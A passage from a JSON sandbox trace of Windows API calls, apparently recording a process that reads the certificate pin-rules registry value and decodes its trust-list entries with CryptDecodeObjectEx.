            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000594"
              },
              {
                "name": "ValueName",
                "value": "PinRulesEncodedCtl"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl"
              }
            ],
            "repeated": 0,
            "id": 1902
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d77000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1903
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba0abb",
            "parentcaller": "0x7ffee0ba0bb3",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000594"
              },
              {
                "name": "ValueName",
                "value": "PinRulesEncodedCtl"
              },
              {
                "name": "Data",
                "value": "0\\x82E\\x94\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82E\\x850\\x82E\\x81\\x02\\x01\\x011\\x0b0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x82'\\xee\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82'\\xdf0\\x82'\\xdb0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x000\\x82\\x1f\\xa30)\\x04\\x12.files-df.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000&\\x04\\x0f.files.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0004\\x04\n.aadrm.com1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0101\\x04\\x07.afx.ms1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0105\\x04\\x0b.akadns.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x010%\\x04\\x0e.aspnetcdn.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0008\\x04\\x0e.azure-int.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl"
              }
            ],
            "repeated": 0,
            "id": 1904
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bbdf92",
            "parentcaller": "0x7ffee0b9e3a5",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x00\\x00\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008004"
              }
            ],
            "repeated": 0,
            "id": 1905
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bb0cd0",
            "parentcaller": "0x7ffee0bbe122",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x07\\xb80\\x82\\x07\\x95\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03!\\x01\\x01\\xff\\x04\\x82\\x07\\x820\\x82\\x07~0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*"
              },
              {
                "name": "Flags",
                "value": "0x00008004"
              }
            ],
            "repeated": 0,
            "id": 1906
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba16b2",
            "parentcaller": "0x7ffee0ba0c01",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000594"
              }
            ],
            "repeated": 0,
            "id": 1907
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7c0a",
            "parentcaller": "0x7ffee0bca060",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x07~0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1908
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1909
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1910
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1911
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1912
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1913
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1914
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd\\x11\\x90\\x10\\xd6\\x83/v\\xde\\xfc94s\\xd7\\xa0\\xced\\xfb\\xd6\\x8d\\xab\\xa2\\x9b\\xfd\\x0b/|\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1915
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x04 =\\xde2\\xff\\xc4p\\x9b\\xb1\\xa3\\xffv\\xd3TA\\xf4\\xae\\x7f\\xe0^\\xe2\\x8a\\xe5\\xd6\\x17\\xa7[\\xd3n\\xeek\\xf5\\xca\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1916
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xa8\\x82z<\\xbd-\\x87\\xd7\\x83\\xb5\\x9b\\x80b\\xc8~\\x9a\\x04 %\\x88%;\\x9aAR$\\x14\\xad\\xc3\\xab\\xa2\\xf0\\xb8\\x17\\xbf;\\xaa\\x0cz\\x0c\\x19diO\\x7f^\\xff\\xc4\\xb9`\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1917
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xadmo\\xf3\\x1b$\\x011Q\\xf2y\\xe2j\\x8c3$\\x04 \\xd61\\xb2F\\x02|\\xa8\\x8e\\x9b\\x03BO#\\x0c\\x9f53R\\xb4\\x9a_\\x9as\\x15Vm\\xc2\\xach\\xd0X\\x16\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1918
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbaO9r\\xe7\\xae\\xd9\\xdc\\xcd\\xc2\\x10\\xdbY\\xda\\x13\\xc9\\x04 \\xe5\\xd4\\x7f\\x02\\xf2t\\x97\\x81\\xc1\\x84\\xab<\\x0fT\\x9eqk\\xb21BJr\\x1f\\xec;\\xdf\\xa17G\\x9e\\x1e\\x15\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1919
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1920
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd0\\xfd<\\x9c8\r{e\\xe2k\\x9a?\\xed\\xd3\\x9b\\x8f\\x04 9\\xa4u\\x87\\x0b\\xf2\\xb4\\x8cR\\x03\\xa0\\x8e\\xa5\"y\\xbc\\xe7\\x1a\\xbb\\x8d>7\\xe0k\\x89\\x07\\xa2g\\xec\\xd7\\xdaj\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1921
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd6`0\\xcd\\xb7\\x92\\x86\\xc9\\xcb\\xee\\x93\\xc1O\\xa3\\x99\\xcc\\x04 E\\xbaB\\xfe\\xb2v\\x9a\\x95c\\xfaQ\\xcc'\\xdd\\x14\\x96\\xef\\xd0\\xe4\\xc5\\xd1\\x96\\x89\\x803\\x17\\x8c\\xc8u\\x8fP\\xca\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1922
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1923
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xfaF\\xce|\\xbb\\x85\\xcf\\xb41\\x00u1:\t\\xee\\x05\\x04 H\\xa0:\\xf5\\x0b\\xc5\\xa1\\xf9q\\xc0\\xc1\\x93\\x8b\n\\xb2\\xd5\\x9bT\\x86\\x9e\\x18\\x01\\xf3x\\x1d^\\x1c\\xd2\\xf7\\xe3\\x93\\x91\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1924
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x81\\xb1\\x02\\x01\\x00\\x02\\x01\\x010\\x81\\xa806\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x0006\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1925
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x81\\xa806\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x0006\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1926
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
